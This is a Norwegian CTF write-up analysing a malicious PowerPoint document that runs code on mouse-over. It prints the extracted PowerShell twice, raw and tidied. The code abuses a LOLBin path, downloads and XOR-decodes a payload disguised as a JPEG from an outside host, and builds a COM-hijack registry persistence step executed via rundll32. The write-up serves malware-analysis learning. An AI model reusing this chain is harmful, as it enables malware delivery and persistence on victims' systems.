Siden oppgaven går på maldocs bebynner vi med oletools.
Dette maldocet bruker en funksjon i powerpoint hvor man kan utføre en handling / følge en link når man er i presentasjonsmodus ved å muse over plassen linken er plassert. I dette tilfellet er det hele bildet. 
Dette maldocet inneholder mao ingen makroer eller slikt...

Vi kan bruke strings forå hente ut koden som kjøres. (evt kan man åpne powerpoint og høyreklikke for å se/editere linken)
`strings -n 30 -e l PresentMePlz.ppt`

"Linken" ser slik  ut 
```
$ strings -e l -n 30 PresentMePlz.ppt 
                        .vbs:..\..\..\..\..\..\..\..\windows/System32::$index_allocation/SyncAppvPublishingServer.vbs" ;$I=$env:Temp+'\local.lnk';if([IO.File]::Exists($I)){break;    };[IO.File]::Create($I,1,[io.FileOPtions]::DeleteOnClose);$r=$ENV:ALLUSERSPROFILE+'\lmapi2.dll';if([IO.File]::Exists($r)){break;    };$l=[Convert]::ToChar(0x2F);$lI='https:%5C%5Chelsectf2023-6ac4e1c6d8855c1bd96a-358bea1cc922.chals.io'+$l+'DSC0002.jpeg';$f=(New-Object Net.WebClient).DownloadData($lI);if($f.Count -lt 10000){break;};$f=$f[2..$f.Count];$x=24;$f=$f|%{    $x=(29*$x+49)% 256;    $_=($_ -bxor $x);    $_    };if($DetteVarEtEkteMaldoc){[IO.File]::WriteAllBytes($r,$f);$k=[Convert]::ToChar(0x23);$z=$l+'c reg ADD HKCU\Software\Classes\CLSID\{2735412E-7F64-5B0F-8F00-5D77AFBE261E}\InProcServer32 '+$l+'t REG_SZ '+$l+'d '+$r+' '+$l+'ve '+$l+'f '+ $l+'reg:64'+' && '+'rundll32.exe '+$r+','+$k+'1';cmd $z;}else{break;};

```


Litt rydding og den ser slik ut:

```
.vbs:..\..\..\..\..\..\..\..\windows/System32::$index_allocation/SyncAppvPublishingServer.vbs" ;
$I=$env:Temp+'\local.lnk';
if([IO.File]::Exists($I)){break;    };
[IO.File]::Create($I,1,[io.FileOPtions]::DeleteOnClose);
$r=$ENV:ALLUSERSPROFILE+'\lmapi2.dll';
if([IO.File]::Exists($r)){break;    };
$l=[Convert]::ToChar(0x2F);
$lI='https:%5C%5Chelsectf2023-6ac4e1c6d8855c1bd96a-358bea1cc922.chals.io'+$l+'DSC0002.jpeg';
$f=(New-Object Net.WebClient).DownloadData($lI);
if($f.Count -lt 10000){break;};
$f=$f[2..$f.Count];
$x=24;$f=$f|%{    $x=(29*$x+49)% 256;    $_=($_ -bxor $x);    $_    };
if($DetteVarEtEkteMaldoc){[IO.File]::WriteAllBytes($r,$f);
  $k=[Convert]::ToChar(0x23);
  $z=$l+'c reg ADD HKCU\Software\Classes\CLSID\{2735412E-7F64-5B0F-8F00-5D77AFBE261E}\InProcServer32 '+$l+'t REG_SZ '+$l+'d '+$r+' '+$l+'ve '+$l+'f '+ $l+'reg:64'+' && '+'rundll32.exe '+$r+','+$k+'1';
  cmd $z;
}else{
  break;
};
```

Den laster ned en filen `DSC0002.jpeg` fra `https://helsectf2023-6ac4e1c6d8855c1bd96a-358bea1cc922.chals.io`.
Filen oppgir å være en jpeg og `file` vil kalle den en jpeg, men den vil ikke la seg åpen. I realiteten er det bare headeren som er jpeg. Ser vi i koden kjøres filen (minus de to første bytene) gjennom en XOR-loop med nøkkel som endres underveis. Repliserer vi XORingen av filen ender vi opp med en PNG-fil med flagget som bilde inni seg.
Som skriptet hinter om ville et ekte maldoc her startet den nye filen for å opprette fotfeste.

<details>
<summary>Flagg.</summary>
flagg: helsectf{https://tinyurl.com/2c6tkzfa}

Tinyurl-linken går til en writeup av et faktisk maldoc som bruker denne teknikken.
</details>